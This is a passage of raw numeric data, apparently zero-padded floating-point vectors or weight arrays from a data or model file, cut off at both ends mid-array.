0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.217583, 0.333111, 0.493664, 0.0417539, -0.230071, -0.175113, 0.41028, 0.188505, 0.191782, 0.19362, 0.118873, -0.0553961, -0.00471752, -0.153423, -0.00139437, -0.102633, 0.162579, -0.130249, -0.128773, -0.0399848, -0.174619, -0.0427518, -0.0819146, 0.378912, 0.0140211, -0.0626778, -0.124141, -0.0796717, 0.00866501, 0.000679958, -0.0575875, 0.0391222, -0.184343, -0.255756, 0.181425, 0.315365, 0.366742, 0.00250051, 0.297935, -0.36375, 0.0428514, -0.00937842, -0.155904, 0.113848, -0.246159, -0.000628342, 0.0999237, 0.0401058, 0.3157, 0.0269517, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0361846, -0.079972, -0.0122646, -0.248673, 0.123096, -0.20429, -0.0238592, 0.116921, 0.0131277, 0.0390148, 0.103756, 0.0376938, 0.0176855, 0.0521339, -0.203624, -0.171873, -0.0578517, -0.251071, -0.0513175, -0.006293, 0.0581248, -0.0891104, 0.0602521, -0.562078, 0.0113607, -0.198882, 0.0879844, -0.036645, -0.128558, 
-0.0188689, -0.301694, -0.0980465, -0.0510968, -0.000773208, -0.0634559, -0.0350683, -0.0860132, 0.00452656, 0.0533589, 0.0725591, 0.207538, 0.0802486, 0.188831, -0.311167, -0.0370482, 0.0729221, 0.0244858, -0.0638124, -0.0676735, 0.119638, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.447263, 2.34394, -0.719156, -0.475018, -1.0442, 1.87757, 0.954614, 0.343229, 0.769032, -0.00889927, 1.26924, -0.0616709, -1.06716, -1.23351, -0.897188, 0.782972, -0.664572, -1.41441, -0.428873, 0.0170897, 0.148884, -0.466033, -1.03905, -1.34964, 0.0275522, -1.31459, -0.201804, -0.656499, 0.330619, 0.0687269, 0.86877, 0.474816, -0.681275, 0.559248, 0.136123, -1.09341, 1.9742, 0.041004, -0.32038, -0.57305, 0.228351, 0.198634, -0.517881, -0.759387, 0.136865, -0.804577, 1.22692, 1.21583, 0.27184, 0.977681, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0592019, 0.515292, 0.23911, -0.253845, -0.0637711, -0.24302, 0.139298, -4.48618, -0.772574, 0.203331, -0.357468, -0.507422, 0.137095, -3.87207, -0.126404, -1.80994, -0.0539826, 0.171511, -0.299418, -0.0298661, -0.0184131, -0.768662, -0.0386186, 0.624169, 0.0265789, 0.20526, 0.198946, 0.201547, -0.0787619, -2.15851, -1.19912, 0.161093, -0.0799011, 0.332071, 0.214417, 0.071333, 0.573987, -0.0411921, -0.0888816, -0.352414, -0.156212, 0.0375721, -0.484814, -0.181606, -0.00443685, 0.197816, -2.09587, 0.034354, 0.134472, -0.255745, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0770236, 0.323499, -0.122922, -0.283081, 0.012659, 0.128671, 0.13313, 0.323254, 0.278067, -0.0412072, -0.176968, -0.323106, -0.435142, 1.11093, -0.121036, 0.0490678, 0.463963, -0.197574, 0.620132, 0.0498911, 0.10769, 0.282115, -0.739223, 1.27729, 0.0120496, 0.33297, -0.605893, -0.290694, -0.11858, 0.209412, 0.222364, -0.0473744, -0.595239, 0.171952, -0.180779, 0.710632, 1.39216, -0.0298722, -0.275149, 0.15668, -0.168725, -0.139975, -0.262862, -0.943151, 0.0267816, 0.251369, 0.222639, -0.198706, -0.176242, 0.0187519, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0909438, 0.446264, -0.12297, 0.32853, -0.0475922, -0.181384, 0.502106, -0.977787, 0.0276056, 0.622991, 0.277136, -0.0385022, -0.332273, 0.628767, 0.518368, -0.325077, -0.553154, 0.273475, 0.336867, 0.0127586, -0.287662, 0.0477017, 0.183786, 1.1639, 0.000681529, 0.154739, 0.148147, 0.382008, 0.0431839, 0.386375, -0.70342, -0.182039, -0.281463, -1.66405, -1.69371, 0.0528063, -0.31867, 0.0497363, 0.126526, 0.764243, -0.685533, 0.0460264, -0.175967, -0.11104, -0.428309, 0.598624, 0.173099, 0.600506, -0.287064, 0.377165, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.254107, 0.0255782, 1.00819, -0.686272, -0.40238, -0.9787, 0.173623, -0.22214, 0.0568515, 0.0609026, -0.397584, -0.335516, 0.341586, -0.016373, -0.270763, 0.0408629, 0.0191987, 0.0726026, 0.543891, -0.0094275, 0.501585, -0.186836, -0.164464, 0.915471, 0.000546313, -0.885644, 0.102587, -0.0142789, -0.0207634, -0.518432, -0.204218, 0.349384, -0.556597, -0.512539, -0.432019, 0.00983373, 0.946167, 
-0.00518444, -0.19851, -0.23748, 0.493114, -0.43727, 0.0479027, -0.602917, 0.362551, -0.399757, -0.148382, 0.01091, -0.451516, -0.993905, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.459758, 0.520354, -0.121305, -0.780212, 0.18052, 0.02329, -0.268215, -0.549481, -0.183309, 0.535353, 1.14021, -1.05518, -0.700147, 0.611426, 0.239386, 0.169951, -0.0630512, -2.04573, 0.451542, -0.0467536, 0.288194, 0.046593, -0.763327, 0.523442, 0.0457224, 1.23234, -3.31972, 0.26318, 0.0514454, 0.263166, 0.483409, -0.147263, -0.0885286, -0.277593, -6.46551, 0.280305, -1.28263, 0.0370086, 0.664247, 0.309804, -0.463115, -2.33773, 0.233339, 0.392515, -0.379144, -0.0607305, 0.235496, 0.0952659, -2.96917, 0.0743473, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.285952, -0.871586, 0.888239, -0.0364492, -0.512282, -0.00203466, 0.0189644, 0.298361, 0.200815, -0.0919211, -0.533476, -1.1145, -0.0765846, -0.639078, 0.965904, 0.142076, -0.190197, 0.241752, -1.43351, 0.0493952, -0.134082, -0.409121, -0.652386, -0.619101, -0.0178322, -0.868774, -0.494859, -0.312532, 0.34638, -0.469054, -0.435009, 0.704507, 0.765912, -0.852589, -0.887224, -0.285932, 0.681342, 0.0438619, 0.488122, -0.557135, 0.302997, -0.31698, 0.151532, -2.42914, -0.192076, -0.654068, 0.451275, 1.33218, -1.38899, -0.385729, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.357836, 0.748835, -0.510494, -0.217073, -0.851313, 
0.764035, -0.0532761, 0.621291, 0.098612, 0.0637257, 1.30833, 0.150276, -0.41462, -0.319508, -0.815441, 0.470836, 0.200124, 0.844909, -0.195831, -0.0206229, -0.600133, -0.0669954, 0.605397, -1.09666, -0.00884459, 0.612709, 0.258529, -0.0477622, -0.754763, 0.0535894, 0.275829, -0.580797, -0.869329, 2.03866, -1.60972, 0.110631, -0.0548995, -0.0316925, -0.491015, -0.186974, -0.794043, 1.0444, -0.0548548, -1.20414, -0.774934, -0.0742906, 0.584991, -0.762577, 0.543872, -0.391631, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0433029, -0.416297, 0.100833, -0.140765, -0.0806606, 0.219095, 0.206728, 0.0663828, -0.196497, 0.279787, 0.181412, -0.246325, -0.218983, -0.0521902, -0.142637, 0.125832, -0.125239, -0.52815, -0.21628, -0.0345887, -0.0947163, 0.187604, 0.322778, -0.847525, -0.000822361, -0.256595, -0.167658, -0.347077, -0.0964017, 0.160761, -0.548702, -0.238669, -0.0914534, 0.571479, -0.535026, 0.111271, 0.405719, -0.0119787, 0.0880991, 0.0616779, 0.0905116, 0.0356997, -0.0893788, -1.87599, 0.141219, -0.0989212, 0.0796625, -0.482802, 0.13512, -0.110484, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [2.41089, -1.62506, -0.826777, 0.131096, 0.833164, -1.07523, 0.18802, -0.0158331, -1.31226, -1.32343, -1.19783, -1.6955, 0.165601, 0.0813795, -2.91451, 0.23938, -0.230521, 0.660564, 0.204835, 0.0337254, 0.640985, -0.200261, -0.227493, -2.62375, 0.00863024, -0.558379, -0.386992, -0.140466, -0.512344, 0.884717, 0.904379, 0.292494, 0.0722427, 2.50082, -0.808813, 2.09373, -2.02111, -0.0173944, -1.58558, 0.72582, 1.33588, -2.59187, -1.01406, -2.6517, 0.86855, 0.555251, 
-3.02315, -0.406161, -1.53505, 0.32331, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.108144, -0.300965, 0.198315, -1.15252, 0.00948435, 0.382935, 1.00755, 0.115352, -0.0281023, 0.778977, 0.556634, -1.01673, -0.0221591, -2.47774, 0.541421, 0.119832, -0.592949, -1.83522, 0.700277, 0.0470511, 0.194825, -0.140949, -1.20612, 0.645988, 0.0465834, -0.192558, -0.505059, -0.541434, 0.0271444, -0.404642, 0.674715, -0.190003, -0.64834, -0.864725, -0.0480265, 0.721166, 1.75514, -0.0229177, 0.575332, -0.322199, 0.348122, -0.405276, -0.430428, -0.723799, -2.04604, 0.320812, 0.271943, 0.282795, 1.02252, 0.315606, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.210162, 0.377139, -0.403842, -0.238233, 0.0190874, 0.433008, 0.159434, -1.32987, 0.0202347, 0.350762, 0.39257, 0.390121, -0.12117, -2.12579, -0.193717, 0.139923, -0.150963, -0.121785, 0.137056, 0.0472637, -0.0294163, -0.343559, 0.587668, -0.644008, 0.0295421, 0.189381, 0.260512, 0.253692, -0.639447, -0.179132, -0.138419, -0.362271, -0.553211, -0.129934, -0.0658039, 0.0959287, 0.187381, -0.0395595, 0.277304, 0.0441888, -0.165279, 0.369496, 0.0330683, 0.526698, -0.414669, -0.631862, 0.517002, -0.382735, 0.112381, 0.174892, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0603485, 0.0234923, 0.268847, 0.575348, -0.741335, 0.497345, 0.296786, -2.04421, -0.708027, 0.613444, -1.04578, 0.309592, 0.0615601, -1.9809, 
0.329142, 0.523389, -0.275038, 0.407382, 0.440782, 0.00952029, -1.01238, -0.182565, 0.107518, 0.122857, -0.0426125, 0.380417, -0.178499, 0.0147519, -0.137907, -1.22669, -0.288971, -0.0185793, -0.273388, 1.5778, -0.0687859, 0.069317, 0.615365, 0.010573, -0.0698254, -0.162375, 0.347239, 0.205983, -0.281441, -1.02307, -0.312022, -0.209126, 0.114547, 0.0323694, -0.114027, 0.0163688, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00442902, 0.839853, -0.0100435, 0.321324, -0.305274, -0.218769, 0.00436133, -0.883695, -0.1289, 0.188632, 0.197957, 0.269262, 0.159596, 0.470647, -0.145572, 0.277401, -0.981907, 0.490607, -0.630832, -0.0312579, 0.118161, -0.114769, 0.720389, -0.055988, -0.0257096, 0.246717, 0.385741, 0.283412, 0.0326635, -0.320576, -3.86593, 0.181242, 0.876639, 0.306347, 0.505138, -0.673902, -2.64392, 0.0272447, 0.256333, -1.02255, -0.250874, -0.0286263, 0.297325, 2.36327, -0.18509, -0.586485, -0.0736053, 0.544031, -0.208321, -0.292522, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-3.02031, 1.566, -3.1468, -6.00822, 1.68889, -3.46644, 1.36785, 1.62156, -0.787889, -0.912853, -3.46163, -2.00832, 0.950419, -3.41412, -13.1709, 1.45211, -2.13336, -4.89634, 1.28512, -0.0317827, 1.23512, 0.234386, -2.64226, 0.238238, -0.0234203, -2.79169, -2.04116, 0.263029, -0.17351, -2.10962, -5.37091, 1.47592, -0.894236, 1.99582, -4.51311, 1.34604, -6.56291, -0.016801, 1.00665, -5.72413, -0.0361098, -7.03096, -0.541493, -8.06534, 0.205915, -2.01471, -2.72852, 0.375396, -7.08815, -0.995415, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.230539, 0.78119, -0.305792, -0.225856, -0.561345, -1.46006, -0.408929, 0.124284, -0.0700589, -0.113292, -2.63192, 0.314629, 0.305446, -2.67951, -0.717398, -1.06053, 0.19749, 0.0960075, 0.656871, -0.0113087, 0.0112421, 0.446883, -0.394166, -0.483058, 0.0274199, -0.0933408, -0.0459104, -0.150368, 0.0938811, 0.255223, -9.34441, -0.0600621, -0.591192, 0.647825, 0.242702, -0.0971076, -1.19003, -0.0435294, -0.0920452, -0.30971, -0.203719, -0.566556, 0.104028, -3.39175, 0.585825, 0.0286875, -0.257401, 0.248378, 0.444376, 0.0446599, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0687898, -0.683721, 0.286262, -0.676821, 0.112379, -0.526663, 0.210065, -1.30148, 0.0415488, 0.504214, -0.393646, -0.153767, -0.35126, -0.23759, 0.303906, -0.0578774, -0.532785, 0.5118, -0.510945, -0.0305743, 0.00832864, 0.165699, -0.123743, 0.320346, 0.0125233, -0.789001, -0.233746, -0.113902, 0.0768009, -0.1502, 0.189723, 0.119955, -0.315111, 0.434449, -0.480134, 0.831122, -0.877712, 0.0242347, 0.356711, -0.336431, -0.0188672, -0.170903, 0.115289, -2.74345, 0.284392, 0.0604477, 0.338903, 0.424516, -0.0233846, 0.215107, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.414511, 0.136261, -0.0600875, 0.339552, 0.0514344, -0.271088, -0.243005, 0.370475, 0.171619, 0.235355, 0.103386, -0.411142, -0.0852257, -3.93079, 0.637717, -0.759663, -0.106099, 0.239224, 0.0795712, 0.00497962, -0.514372, 0.164885, 0.259969, 0.329819, 
-0.00592358, 0.683025, -0.504548, 0.162416, -0.110852, -0.0598116, 1.43517, -0.275648, -0.0110099, 0.142208, 0.0201649, -0.332445, -1.34796, 0.0476049, 0.388066, -0.571529, -0.300937, -0.181822, 0.0863441, -2.03682, 0.142363, -0.15876, -0.214809, -0.192197, 0.10632, 0.0285164, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.324612, 0.916644, 0.621455, 0.357618, 0.0345054, -0.276184, -0.201231, 0.256104, 0.155517, 0.152807, -0.0616519, 0.0978553, 0.165679, -1.77874, 0.456725, -0.439168, 0.0387082, 0.0993453, 0.463254, -0.0448257, -0.259973, 0.156005, 0.0990992, 0.120151, -0.00783338, 0.100165, 0.371636, 0.0494161, 0.409908, -0.373616, -0.877059, 0.283091, 0.028336, -0.467666, 0.631997, -0.428457, 0.532849, -0.00409609, -0.241603, -0.150002, 0.0774017, -0.187154, 0.243124, 1.09842, -0.274917, 0.0731125, -0.287736, 0.314341, 0.639913, -0.178678, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-4.08871, -1.8082, 1.84166, -1.12629, 0.530201, 0.202222, 0.376116, -0.86772, -1.7774, -2.09831, -0.45749, -0.737517, 0.585849, 0.10502, 1.72886, 0.692817, -1.31767, 1.20079, -0.374831, -0.0207036, -0.369592, 0.40584, -0.906016, -4.95034, -0.0381483, -2.86956, -1.09537, 0.682012, -0.217794, -0.506311, -0.252425, 0.785354, -0.353075, 3.35127, -2.07647, -1.45178, -0.0877346, 0.0495282, 1.11189, -2.72542, -0.179078, -0.707539, 0.263581, 0.215376, -3.64249, -0.264756, -1.41551, 1.37657, -1.85277, -0.78059, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.383422, -0.0284065, 0.087133, 0.0931196, 0.164841, -0.364064, 0.651404, -1.4823, 0.0172269, -1.82474, 0.208926, -1.35132, -0.433627, -0.239893, 0.126217, 0.0530793, 0.234489, -0.211085, -1.25031, 0.00707273, 0.482926, -0.852424, -0.137594, 0.86615, -0.0367426, -0.781451, -0.583006, 0.581821, -0.392725, -0.773366, 0.811804, -0.55046, -0.275705, 0.631768, -0.996308, 0.653303, -0.298784, 0.0155895, -0.555537, -0.812097, 0.904718, -1.69388, 0.1559, -0.277269, 0.212396, -0.373207, 0.920618, -0.0701261, -0.706152, -0.638607, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.471983, 0.837119, -0.330892, -1.67828, -0.244209, -0.490259, -0.172925, -1.39241, -0.565257, -1.06744, -0.315526, 0.245198, 0.261793, 2.04893, -0.92776, -1.97889, 0.151144, -0.300798, -0.0124347, 0.0390675, 0.344207, -0.342577, -1.10444, 0.639264, 0.0431252, -0.335031, -0.393348, 0.19617, -0.231878, 0.502312, -2.34856, 0.100049, -0.304427, -0.339954, 0.654426, 0.157273, -0.478207, 0.000148418, 0.189041, -0.00179308, 0.00456751, 0.0613986, -0.0166205, -0.865483, 0.659393, -0.642149, 0.186779, 0.137543, -0.526351, 0.0994014, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.290284, 0.305784, 0.864206, -0.908854, 0.00175597, 0.208558, -0.862763, 0.513859, 0.243665, 0.317073, 0.426666, -0.866842, 0.287274, -0.315787, -0.322341, -0.560977, 0.0326614, -0.143722, -0.136812, 0.031198, 0.010898, 0.0295527, -0.0176961, 2.17577, -0.0110202, -0.269706, 0.0377319, 0.279166, 0.0275709, -0.249412, 0.00806171, -0.226273, -0.615702, 
-0.49141, 0.575461, 0.0983534, -0.083624, -0.0120909, 0.730296, -0.169963, 0.0288122, -0.0833977, -0.129491, -1.44739, 0.148493, 0.338998, -0.50266, 0.0557751, -0.0847156, -0.342571, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.291413, 0.970204, 0.323319, -0.633429, 0.190727, 0.93699, 1.07859, -4.58917, 0.10526, 0.702462, 0.101114, 0.423643, -0.577021, -7.02019, -1.08807, -0.966729, -1.80677, -0.702224, 0.338289, -0.0247392, 0.599224, -0.716852, 1.33733, 1.59795, 0.0344076, -0.752955, 0.737648, 0.505385, 0.314934, -1.47054, -7.40439, -0.22662, -0.469541, 1.07876, -2.38283, -0.813889, 2.73285, 0.0171571, 0.282823, 0.522423, 0.0157471, 0.516202, 1.11102, -15.954, 0.741384, 0.388727, -0.867902, 0.529352, -0.401276, -2.66442e-06, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.114537, 0.10598, -0.156172, 0.570041, 0.0790781, 0.0249465, -0.144188, -5.14901, -0.276242, -0.242514, 0.823004, -0.0894113, 0.0992198, 0.116433, 0.0494211, 1.18263, 0.309327, 0.695546, -0.30725, 0.0469877, -0.249266, 0.22872, 0.029531, -0.0321301, 0.0170964, 0.177514, -0.158719, -0.0720184, 0.251617, -0.322835, -0.869999, -0.0683697, 0.0689967, 1.1044, 0.658776, 0.141733, -0.642675, 0.0227559, 